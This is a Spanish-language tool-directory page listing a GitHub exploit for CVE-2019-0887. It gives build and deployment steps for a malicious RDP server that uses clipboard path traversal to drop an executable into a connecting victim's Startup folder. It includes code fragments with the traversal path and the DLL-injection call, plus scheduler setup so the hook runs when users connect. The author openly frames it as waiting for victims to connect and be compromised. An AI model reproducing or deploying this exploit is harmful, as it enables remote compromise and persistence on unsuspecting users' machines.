Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/t43wiu6/cve-2019-0887
Escalada de PrivilegiosMecanismos de PersistenciaExplotaciónMovimiento LateralPost-ExplotaciónDesarrollo de PayloadsExplotación de Binarios
GitHubt43wiu6/cve-2019-0887

CVE-2019-0887

exp para CVE-2019-0887

Ver Repositorio
189hace 5 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2019-0887

Compila el CVE-2019-0887, renómbralo a winhlp.dll

Compila Install_Hook, renómbralo a hook.exe

cuidado, deben compilarse con x64

Ponlos en el sistema malvado tal cual

root@kitploit:~
c:\windows\hook.exe
c:\windows\winhlp.dll

c:\windows\winhlp64.exe # something evil 

Si alguien quiere cambiar la ruta, aquí está el punto

root@kitploit:~
# CVE-2019-0887/dllmain.cpp
WCHAR  evalfile[] = { L"C:\\windows\\winhlp64.exe" };
WCHAR  efile[] = { L"C:\\windows\\system32\\..\\..\\..\\..\\..\\../AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/winhlp32.exe" };

# Install_Hook/ConsoleApplication.cpp
LoadDll(pid, "C:\\Windows\\winhlp.dll");

Puedes usar taskschd.msc para crear un Plan de tareas, establecer un desencadenador "Al conectarse a una sesión de usuario" y configurar la ruta del archivo hook.exe.

Esperando a que algunos tipos se conecten a mi sistema malvado, copien algo, y pwn...

Consejos: ¿Por qué no usar el secuestro de DLL?

Descargar herramienta